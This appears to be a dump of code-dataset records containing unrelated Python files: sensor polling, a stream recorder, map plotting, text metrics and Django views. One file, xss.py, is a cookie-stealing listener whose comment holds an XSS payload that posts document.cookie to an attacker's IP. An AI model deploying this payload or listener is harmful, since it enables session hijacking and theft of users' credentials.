'4'\ncorreccion_temperatura=0.065\ncorreccion_humedad=0.065\nclass hilo_gpio (threading.Thread):\n\n    def __init__(self):\n        threading.Thread.__init__(self)  # initialise the Thread base class so start()/join() work\n        self.r = redis.StrictRedis(host='localhost', port=6379, db=0, charset='utf-8')\n        print(\"************************************************************\")\n        print(\"Started thread polling date and temperature\")\n        print(\"************************************************************\")\n\n    def run(self):\n        # start() invokes run(); the polling loop lives in arranco()\n        self.arranco()\n\n    def arranco(self):\n        while True:\n\n            humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n\n            # Note that sometimes you won't get a reading and\n            # the results will be null (because 
Linux can't\n            # guarantee the timing of calls to read the sensor).\n            # If this happens try again!\n            if humidity is not None and temperature is not None:\n                print('Temp={0:0.1f}*C Humidity={1:0.1f}%'.format(temperature, humidity))\n            else:\n                print('Failed to get reading. Try again!')\n            datos={}\n            if temperature:\n                print(\"raw temperature: \"+'{0:0.1f}'.format(temperature))\n                valor_resta=temperature*correccion_temperatura\n                temperature=temperature-valor_resta\n                print(\"corrected temperature: \" + '{0:0.1f}'.format(temperature))\n                datos['temperatura']='{0:0.1f}'.format(temperature)\n            if humidity:\n                print(\"raw humidity: \" + '{0:0.1f}'.format(humidity))\n                valor_resta_h=humidity*correccion_humedad\n                humidity=humidity+valor_resta_h\n                datos['humedad'] = '{0:0.1f}'.format(humidity)\n                print(\"corrected humidity: \" + '{0:0.1f}'.format(humidity))\n            #datos['fecha']=datetime.now().isoformat()\n            datos['fecha']=time.strftime(\"%Y.%m.%d %H:%M:%S\")\n            print(datos)\n            if temperature is None:\n                self.r.lpush(\"dht22-errores\",datetime.now().isoformat()+\": error temperatura\")\n                os.system('reboot')\n            try:\n                dataValues = json.dumps(datos)\n                self.r.lpush(\"dht22\",dataValues)\n                self.r.set(\"temperaturaActual\", dataValues)\n                self.r.publish('dht22', dataValues)\n                # wait 10 seconds between readings\n                time.sleep(10)\n            except ValueError as err:\n                print(err)\n\n\nif __name__== \"__main__\":\n\n    while True:\n        dht22 = hilo_gpio()\n        dht22.start()\n        dht22.join()\n        #print(\"SENDER THREAD FINISHED, waiting 10 s before Start\")\n        time.sleep(10)","sub_path":"src/sensores-reles/getTemp.py","file_name":"getTemp.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100053483","text":"from mdblog.app import flask_app\r\nfrom mdblog.models import db\r\nfrom mdblog.models import Article\r\n\r\nfrom loremipsum import get_sentences\r\nimport random\r\n\r\nCOUNT = 50\r\n\r\ndef create_article(num):\r\n    title = \"Article {:02}\".format(num)\r\n    \r\n    content = \" \".join(get_sentences(random.randint(3,9), True))\r\n    article = Article(title=title, content=content)\r\n    return article\r\n    \r\nwith flask_app.app_context():\r\n\r\n    for num in range(1, COUNT+1):\r\n        article = create_article(num)\r\n        db.session.add(article)\r\n        db.session.commit()\r\n        print (\"article #{:02d} created!\".format(num))","sub_path":"fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80920880","text":"import argparse\nimport requests\nfrom streamlink import Streamlink\nimport sys\nimport time\nfrom youtube_dl import YoutubeDL\n\ndef get_channels():\n\treturn [\"oFjKZ2S0K4U\", \"A64obrjX0sE\", \"ff0nG6_uhsw\"]\n\ndef record_stream(channel, output_dir):\n\tchannels = get_channels()\n\tchannel_url = \"http://www.youtube.com/watch?v={}\".format(channels[channel - 1])\n\tprint(\"Downloading from\", channel_url)\n\n\tydl = YoutubeDL()\n\tydl.add_default_info_extractors()\n\n\tfilename = \"channel{}-{}.ts\".format(channel, int(time.time()))\n\n\tstreamlink = Streamlink()\n\tstreamlink.set_loglevel(\"debug\")\n\tstreamlink.set_logoutput(output_dir + \"/\" + filename + \".log\")\n\tstreamlink.set_option(\"hls-live-edge\", 9999999)\n\tstreamlink.set_option(\"hls-segment-attempts\", 99)\n\tstreamlink.set_option(\"hls-segment-threads\", 5)\n\tstreamlink.set_option(\"hls-segment-timeout\", 9999)\n\n\tstreams = streamlink.streams(channel_url)\n\tstream = 
streams[\"best\"]\n\tprint(\"Found stream {}\".format(stream.url))\n\tprint(\"Writing stream to {}\".format(output_dir + \"/\" + filename))\n\twith open(output_dir + \"/\" + filename, 'wb') as out_file, stream.open() as in_stream:\n\t\twhile True:\n\t\t\tdata = in_stream.read(1024)\n\t\t\tif not data:\n\t\t\t\treturn\n\t\t\tout_file.write(data)\n\nparser = argparse.ArgumentParser(description='Record a Lollapalooza channel')\nparser.add_argument('channel')\nparser.add_argument('-o', '--output-dir', default=\"./streams\")\n\nargs = parser.parse_args()\n\nif not args.channel:\n\tprint(\"Supply a channel\")\n\texit()\nchannel = int(args.channel)\n\nif channel < 1 or channel > 3:\n\tprint(\"Channel must be one of 1, 2 and 3\")\n\texit()\n\nwhile True:\n\trecord_stream(channel, args.output_dir)\n","sub_path":"lollapalooza-2019/download-channel.py","file_name":"download-channel.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"350789972","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 14 09:44:13 2021\r\n\r\n@author: wangwy\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport pygal\r\nimport pycountry_convert as pc\r\n\r\ndef country_to_code(country):\r\n try:\r\n return pc.country_name_to_country_alpha2(country).lower()\r\n except:\r\n #print(str(country) + \" is not a country.\")\r\n return\r\n\r\ndef create_chart(year):\r\n df = pd.read_csv(\"export.csv\")\r\n df = df.fillna(0)\r\n display(df)\r\n #df.rename( columns={'Unnamed: 0':'Country'}, inplace=True )\r\n #large = max(df[str(year)])\r\n #print(large)\r\n #df[\"Total\"] = df[\"Total\"].apply(lambda x: 100*x/large)\r\n df[\"COUNTRY NAME\"] = df[\"COUNTRY NAME\"].apply(country_to_code)\r\n df.dropna()\r\n #display(df)\r\n df = df[df[\"YEAR\"] == year]\r\n #display(df)\r\n data = dict(zip(df[\"COUNTRY NAME\"], df[\"VALUE\"]))\r\n #print(data)\r\n worldmap_chart = pygal.maps.world.World()\r\n worldmap_chart.title = 'Agriculture in ' + str(year)\r\n worldmap_chart.add(\"Total\", data)\r\n #worldmap_chart.render_in_browser()\r\n worldmap_chart.render_to_file(\"static/maps/agriculture/\" + str(year)+\".svg\")\r\n return worldmap_chart\r\n \r\nfor i in range(2001, 2017):\r\n create_chart(i)\r\n","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"120843563","text":"from request import Request\nfrom person import Person\nfrom skill import Skill\n\nfrom names import get_full_name as name\nfrom random import sample, randint, uniform\n\nimport json\nimport sys\n\n\ndef find_best_candidate(people, request, num=1):\n \"\"\"\n Matchs people and requested skills, then returns the top [num] people.\n \"\"\"\n\n # compare request to people skills\n for p in people:\n p.get_score(request)\n\n # sort people by score\n people.sort(reverse=True)\n\n return people[:num]\n\n\ndef generate_data(path, num=25):\n \"\"\"\n Generates random request and [num] people based on json file at [path].\n \"\"\"\n # get list of possible skills\n with open(path) as f:\n json_data = json.load(f)\n\n words = set(json_data[\"words\"])\n\n # create request (similar to the word list from an email)\n request = Request(*sample(words, randint(3, 4)))\n\n # create random people, and a known one with given skills\n people = []\n for _ in range(num):\n sublist = sample(words, randint(3, 6))\n\n person_skills = [Skill(s, uniform(.75, 1.)) 
for s in sublist]\n\n people.append(Person(name(), person_skills))\n\n return people, request\n\n\ndef static_data():\n \"\"\"\n Returns pre-generated data. Each time the data returned is the same.\n \"\"\"\n\n request = Request(\"fortran\", \"sql\", \"word\", \"github\")\n\n people = [\n Person(\"Raymond Harris\", [\n Skill(\"latex\", 0.76),\n Skill(\"kotlin\", 0.77),\n Skill(\"powerpoint\", 1.00),\n Skill(\"ios\", 0.58),\n Skill(\"linux\", 0.56)\n ]),\n Person(\"Robert Willis\", [\n Skill(\"macos\", 0.99),\n Skill(\"swift\", 0.74),\n Skill(\"vi\", 0.62),\n Skill(\"adobe\", 0.68)\n ]),\n Person(\"Marta Jordon\", [\n Skill(\"swift\", .56),\n Skill(\"data vis.\", 0.72),\n Skill(\"versionning\", 0.84),\n Skill(\"raspberry pi\", 0.93)\n ]),\n Person(\"Genevieve Keaney\", [\n Skill(\"powerpoint\", 0.61),\n Skill(\"github\", 0.84),\n Skill(\"c++\", 0.93)\n ]),\n Person(\"Christopher Sanders\", [\n Skill(\"word\", 0.91),\n Skill(\"c++\", 0.54),\n Skill(\"linux\", 0.52),\n Skill(\"sql\", 0.76),\n Skill(\"big data\", 0.68)\n ])\n ]\n\n return people, request\n\n\nif __name__ == \"__main__\":\n \"\"\"\n execution:\n python src/main.py [-auto] \n \"\"\"\n\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n\n if \"-auto\" in opts:\n people, request = generate_data('assets/data.json', 5)\n else:\n people, request = static_data()\n\n candidate = find_best_candidate(people, request, 1)\n\n for c in candidate:\n print(c)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481299624","text":"from turtle import *\nglobal a\na = 60\n\ndef romb ():\n fillcolor(\"red\")\n begin_fill()\n fd(a)\n rt(180+108)\n fd(a)\n rt(180)\n rt(72)\n fd(a)\n rt(180)\n lt(72)\n rt(180)\n fd(a)\n end_fill()\n\ndef platek():\n romb()\n lt(108)\n fd(a)\n lt(36)\n fd(a)\n rt(180-108)\n fd(a)\n rt(180)\n romb()\n rt(180+72+72)\n romb()\n lt(108)\n fd(a)\n rt(180+108)\n fd(a)\n rt(180)\n romb()\n rt(180)\n romb()\n rt(180)\n fd(a)\n rt(180+108)\n fd(a)\n lt(180+108+180)\n romb()\n lt(108)\n rt(72)\n romb()\n\ndef KWIATEK():\n setheading(90)\n for i in range(5):\n setheading(90+72*i+1)\n platek()\n pu()\n setpos(0,0)\n pd()\n\ndef srodek_kwiatka():\n pu()\n setpos(0,0)\n setheading(90)\n for i in range(5):\n pu()\n setpos(0,0)\n pd()\n setheading(90+72*i)\n romb()\nspeed(0)\nKWIATEK()\n","sub_path":"konkursy/03_2004/03_2/kwiatek.py","file_name":"kwiatek.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91310456","text":"\nimport math\n\nimport numpy as np\nimport scipy.io\n\nimport random\nimport tensorflow as tf \nfrom glob import glob as glb\nimport pylab as pl\n\nimport bouncing_balls as b\n\nfrom tqdm import *\n\nFLAGS = tf.app.flags.FLAGS\n\n# helper function\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef get_converted_frame(cap, shape):\n ret, frame = cap.read()\n frame = cv2.resize(frame, shape, interpolation = cv2.INTER_CUBIC)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n return frame\n\ndef tryint(s):\n try:\n return int(s)\n except:\n return s\n\ndef alphanum_key(s):\n return [ tryint(c) for c in re.split('([0-9]+)', s) ]\n\ndef load_flow(filename, shape, frame_num):\n # load and reshape\n fluid_state = np.loadtxt(filename)\n fluid_state = fluid_state.reshape(shape[0], shape[1], frame_num)\n return 
fluid_state\n\ndef load_boundry(filename, shape, frame_num):\n # load and reshape\n ball_location= np.loadtxt(filename)\n b1x = ball_location[0]\n b1y = ball_location[1]\n b2x = ball_location[2]\n b2y = ball_location[3]\n b3x = ball_location[4]\n b3y = ball_location[5]\n b4x = ball_location[6]\n b4y = ball_location[7]\n\n # calc signed distance function.\n boundry = np.zeros((shape[0], shape[1], 2))\n for x in xrange(shape[0]):\n for y in xrange(shape[1]):\n # distance ball 1\n d1 = np.sqrt(np.square(b1x - x) + np.square(b1y - y))\n d2 = np.sqrt(np.square(b2x - x) + np.square(b2y - y))\n d3 = np.sqrt(np.square(b3x - x) + np.square(b3y - y))\n d4 = np.sqrt(np.square(b4x - x) + np.square(b4y - y))\n dw1 = y\n dw2 = shape[1] - y\n min_d = np.min([np.min([d1, d2, d3, d4]) - 10, dw1, dw2])\n #if min_d < 0: # 10 because the balls are size 10\n # min_d = -min_d \n boundry[x,y,0] = min_d\n boundry[x,y,1] = x\n #print(boundry[b1x,b1y])\n #print(boundry[b1x-10,b1y])\n #pl.imshow(boundry[:,:,0])\n #pl.show()\n #pl.imshow(boundry[:,:,1])\n #pl.show()\n \n return boundry\n \n\ndef generate_tfrecords(seq_length, num_runs, shape, frame_num, dir_name):\n\n if not tf.gfile.Exists(FLAGS.data_dir + 'tfrecords/' + dir_name):\n tf.gfile.MakeDirs(FLAGS.data_dir + 'tfrecords/' + dir_name)\n\n print('generating records')\n for run in tqdm(xrange(num_runs)):\n filename = FLAGS.data_dir + 'tfrecords/' + dir_name + '/run_' + str(run) + '_seq_length_' + str(seq_length) + '.tfrecords'\n \n tfrecord_filename = glb(FLAGS.data_dir + 'tfrecords/' + dir_name + '/*') \n\n if filename not in tfrecord_filename:\n \n writer = tf.python_io.TFRecordWriter(filename)\n \n \n mat_filenames = glb('../systems/store_' + dir_name + '/sam' + str(run) + '/run*')\n num_samples = len(mat_filenames)\n \n # first calc boundry\n boundry_cond = load_boundry('../systems/store_' + dir_name + '/sam' + str(run) + '/run', shape, frame_num)\n boundry_cond = np.float32(boundry_cond)\n boundry_flat = boundry_cond.reshape([1,shape[0]*shape[1]*2])\n boundry_raw = boundry_flat.tostring()\n\n # save tf records\n ind_dat = 0\n while ind_dat < (num_samples - seq_length - 1):\n print(\"read!\")\n seq_frames = np.zeros((seq_length,shape[0],shape[1],frame_num))\n for i in xrange(seq_length):\n flow_state = load_flow('../systems/store_' + dir_name + '/sam' + str(run) + '/run' + str(i+ind_dat+1) + '.data', shape, frame_num)\n flow_state = np.float32(flow_state)\n seq_frames[i, :, :, :] = flow_state \n ind_dat = ind_dat + 1\n seq_frames = np.float32(seq_frames)\n seq_frames_flat = seq_frames.reshape([1,seq_length*shape[0]*shape[1]*frame_num])\n seq_frame_raw = seq_frames_flat.tostring()\n # create example and write it\n example = tf.train.Example(features=tf.train.Features(feature={\n 'flow': _bytes_feature(seq_frame_raw),\n 'boundry': _bytes_feature(boundry_raw)})) \n writer.write(example.SerializeToString()) \n \n \n","sub_path":"systems/fluid_createTFRecords.py","file_name":"fluid_createTFRecords.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651964395","text":"# Copyright (c) 2018-present, Ahmed H. Al-Ghidani.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n#\n\n__author__ = \"Ahmed H. Al-Ghidani\"\n__copyright__ = \"Copyright 2018, The mleus Project, https://github.com/AhmedHani/mleus\"\n__license__ = \"BSD 3-Clause License\"\n__maintainer__ = \"Ahmed H. 
Al-Ghidani\"\n__email__ = \"ahmed.hani.ibrahim@gmail.com\"\n\nimport string\nfrom scipy import spatial\nimport collections\nimport math\n\n\ndef maximum_matching(list1, list2):\n list1.sort()\n list2.sort()\n\n counter = 0\n\n for item1 in list1:\n for item2 in list2:\n if item1 == item2:\n counter += 1\n\n return counter\n\n\n# https://rosettacode.org/wiki/Levenshtein_distance#Python\n#print(levenshteinDistance([\"kiten\"], [\"kiten\", \"kitten\", \"fdf\", \"dfu\"]))\n#print(levenshteinDistance(\"rosettacode\", \"raisethysword\"))\ndef levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = []\n for i in range(m + 1):\n d.append([i])\n del d[0][0]\n for j in range(n + 1):\n d[0].append(j)\n for j in range(1, n + 1):\n for i in range(1, m + 1):\n if str1[i - 1] == str2[j - 1]:\n d[i].insert(j, d[i - 1][j - 1])\n else:\n minimum = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + 2)\n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist) / lensum\n\n return {'distance': ldist, 'ratio': ratio}\n\n\ndef cosine_distance(list1, list2):\n distance = 1 - spatial.distance.cosine(list(list1), list(list2))\n\n return distance\n\n\ndef compute_bleu(reference_corpus, translation_corpus, max_order=4, smooth=False):\n # Copyright 2017 Google Inc. All Rights Reserved.\n #\n # Licensed under the Apache License, Version 2.0 (the \"License\");\n # you may not use this file except in compliance with the License.\n # You may obtain a copy of the License at\n #\n # http://www.apache.org/licenses/LICENSE-2.0\n #\n # Unless required by applicable law or agreed to in writing, software\n # distributed under the License is distributed on an \"AS IS\" BASIS,\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n # See the License for the specific language governing permissions and\n # limitations under the License.\n # ==============================================================================\n\n \"\"\"Computes BLEU score of translated segments against one or more references.\n\n Args:\n reference_corpus: list of lists of references for each translation. Each\n reference should be tokenized into a list of tokens.\n translation_corpus: list of translations to score. Each translation\n should be tokenized into a list of tokens.\n max_order: Maximum n-gram order to use when computing BLEU score.\n smooth: Whether or not to apply Lin et al. 
2004 smoothing.\n\n Returns:\n 3-Tuple with the BLEU score, n-gram precisions, geometric mean of n-gram\n precisions and brevity penalty.\n \"\"\"\n\n def _get_ngrams(segment, max_order):\n \"\"\"Extracts all n-grams upto a given maximum order from an input segment.\n\n Args:\n segment: text segment from which n-grams will be extracted.\n max_order: maximum length in tokens of the n-grams returned by this\n methods.\n\n Returns:\n The Counter containing all n-grams upto max_order in segment\n with a count of how many times each n-gram occurred.\n \"\"\"\n ngram_counts = collections.Counter()\n for order in range(1, max_order + 1):\n for i in range(0, len(segment) - order + 1):\n ngram = tuple(segment[i:i + order])\n ngram_counts[ngram] += 1\n return ngram_counts\n\n\n matches_by_order = [0] * max_order\n possible_matches_by_order = [0] * max_order\n reference_length = 0\n translation_length = 0\n for (references, translation) in zip(reference_corpus,\n translation_corpus):\n reference_length += min(len(r) for r in references)\n translation_length += len(translation)\n\n merged_ref_ngram_counts = collections.Counter()\n for reference in references:\n merged_ref_ngram_counts |= _get_ngrams(reference, max_order)\n translation_ngram_counts = _get_ngrams(translation, max_order)\n overlap = translation_ngram_counts & merged_ref_ngram_counts\n for ngram in overlap:\n matches_by_order[len(ngram)-1] += overlap[ngram]\n for order in range(1, max_order+1):\n possible_matches = len(translation) - order + 1\n if possible_matches > 0:\n possible_matches_by_order[order-1] += possible_matches\n\n precisions = [0] * max_order\n for i in range(0, max_order):\n if smooth:\n precisions[i] = ((matches_by_order[i] + 1.) /\n (possible_matches_by_order[i] + 1.))\n else:\n if possible_matches_by_order[i] > 0:\n precisions[i] = (float(matches_by_order[i]) /\n possible_matches_by_order[i])\n else:\n precisions[i] = 0.0\n\n if min(precisions) > 0:\n p_log_sum = sum((1. / max_order) * math.log(p) for p in precisions)\n geo_mean = math.exp(p_log_sum)\n else:\n geo_mean = 0\n\n ratio = float(translation_length) / reference_length\n\n if ratio > 1.0:\n bp = 1.\n else:\n bp = math.exp(1 - 1. 
/ ratio)\n\n bleu = geo_mean * bp\n\n return (bleu, precisions, bp, ratio, translation_length, reference_length)\n","sub_path":"mleus/utils/algorithm_utils.py","file_name":"algorithm_utils.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"612673254","text":"from django.conf import settings\nfrom django_mako_plus import view_function\nfrom homepage.models import Recipe, Category\nfrom django import forms\nfrom django.http import HttpResponseRedirect\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.decorators import login_required\n\n@view_function\n@login_required(login_url='/account/login/')\ndef process_request(request, recipe:Recipe):\n\n if recipe.owner != request.user:\n return HttpResponseRedirect('/homepage/index')\n \n # for POST requests\n if(request.method == \"POST\"):\n form = EditRecipeForm(request.POST)\n \n if(form.is_valid()):\n form.commit(recipe)\n return HttpResponseRedirect('/homepage/recipe/'+str(recipe.id))\n \n # for GET requests show the blank form\n else:\n form = EditRecipeForm(initial=model_to_dict(recipe))\n \n context = {\n 'form': form,\n 'recipe': recipe\n }\n\n return request.dmp.render('edit.html', context)\n\n\nclass EditRecipeForm(forms.Form):\n name = forms.CharField(label='* Recipe Title', required=True)\n ingredients = forms.CharField(label=\"* Ingredients\",widget=forms.Textarea(attrs={'rows': 4}), required=True)\n steps = forms.CharField(label=\"* Steps\",widget=forms.Textarea(attrs={'rows': 4}), required=True)\n category = forms.ModelChoiceField(label=\"* Category\", queryset=Category.objects.all(), empty_label=None)\n notes = forms.CharField(label=\"Notes\", widget=forms.Textarea(attrs={'rows': 2}), required=False)\n link = forms.URLField(label='URL', required=False)\n image_link = forms.URLField(label='Image URL', required=False)\n \n def commit(self, r):\n r.name = self.cleaned_data.get('name')\n r.ingredients = self.cleaned_data.get('ingredients')\n r.steps = self.cleaned_data.get('steps')\n r.category = self.cleaned_data.get('category')\n r.link = self.cleaned_data.get('link')\n r.notes = self.cleaned_data.get('notes')\n r.image_link = self.cleaned_data.get('image_link')\n r.save()","sub_path":"homepage/views/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365652181","text":"# document.cookie=\"name=\"\n# $.post('http://IP/cookie', {cookie: document.cookie});\n\n#!usr/bin/env python3\n# coding: utf8\n\nimport urllib, datetime\nfrom http.server import (HTTPServer, BaseHTTPRequestHandler)\n\nclass CustomRequestHandler(BaseHTTPRequestHandler):\n\tdef do_POST(self):\n\t\tlength = int(self.headers['Content-Length'])\n\t\tcontent = self.rfile.read(length)\n\t\tdata = urllib.parse.parse_qs(content.decode('utf-8'))\n\n\t\tprint('FROM : {0} AT : {1}'.format(self.headers['Referer'], str(datetime.datetime.now())[:-7]))\n\n\t\tif self.path == '/cookie':\n\t\t\tprint('COOKIE : \\u2193 \\n{0}'.format(data['cookie'][0]))\n\t\telse:\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Access-Control-Allow-Origin', '*')\n\t\t\tself.end_headers()\n\ndef main():\n\tserver_class = HTTPServer\n\thandler_class = CustomRequestHandler\n\tserver_address = ('IP', 2020)\n\thttpd = server_class(server_address, handler_class)\n\thttpd.serve_forever()\n\nif __name__ == 
'__main__':\n\tmain()","sub_path":"xss.py","file_name":"xss.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"436092235","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom home.models import Person, Address, Phone, Email, Groups\n\n\n# DELETE\nclass Main(View):\n    def __init__(self):\n        self.message = ''\n\n    def get(self, request, *args, **kwargs):\n        people = Person.objects.order_by('surname')\n        return render(request, 'main.html', {\"people\": people,\n                                             \"message\": self.message})\n\n\nclass DeleteContact(Main):\n    def get(self, request, id):\n        t = Person.objects.filter(id=id)\n        t.delete()\n        self.message = \"We have just deleted this contact\"\n        return super().get(request)\n\n\n# MODIFY/DEL\nclass ConDetailsMain(View):\n    def __init__(self):\n        self.message = ''\n\n    def get(self, request, id, *args, **kwargs):\n        person_details = Person.objects.filter(id=id)\n        # related rows are keyed by the person's id\n        address_details = Address.objects.filter(person_id=id)\n        phone_details = Phone.objects.filter(person_id=id)\n        email_details = Email.objects.filter(person_id=id)\n        return render(request, 'showdetails.html', {\"person_details\": person_details,\n                                                    \"address_details\": address_details,\n                                                    \"phone_details\": phone_details,\n                                                    \"email_details\": email_details})\n\n\nclass DeleteDescription(ConDetailsMain):\n    def get(self, request, id):\n        t = Person.objects.get(id=id)\n        t.description = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteCity(ConDetailsMain):\n    def get(self, request, id):\n        t = Address.objects.get(person_id=id)\n        t.city = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteStreet(ConDetailsMain):\n    def get(self, request, id):\n        t = Address.objects.get(person_id=id)\n        t.street = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteHouseNumber(ConDetailsMain):\n    def get(self, request, id):\n        t = Address.objects.get(person_id=id)\n        t.house_number = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteFlatNumber(ConDetailsMain):\n    def get(self, request, id):\n        t = Address.objects.get(person_id=id)\n        t.flat_number = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeletePhoneNumber(ConDetailsMain):\n    def get(self, request, id):\n        t = Phone.objects.get(person_id=id)\n        t.phone_number = None\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeletePhoneType(ConDetailsMain):\n    def get(self, request, id):\n        t = Phone.objects.get(person_id=id)\n        t.phone_type = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteEmail(ConDetailsMain):\n    def get(self, request, id):\n        t = Email.objects.get(person_id=id)\n        t.email = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteEmailType(ConDetailsMain):\n    def get(self, request, id):\n        t = Email.objects.get(person_id=id)\n        t.email_type = ''\n        t.save()\n        return redirect('/showdetails/{}'.format(id))\n\n\nclass EditContact(Main):\n    @method_decorator(csrf_exempt)\n    def dispatch(self, *args, **kwargs):\n        return super().dispatch(*args, **kwargs)\n\n    def get(self, request, id):\n        t = Person.objects.get(id=id)\n        a = Address.objects.get(person_id=id)\n        p = Phone.objects.get(person_id=id)\n        e = Email.objects.get(person_id=id)\n\n        form = 
\"\"\"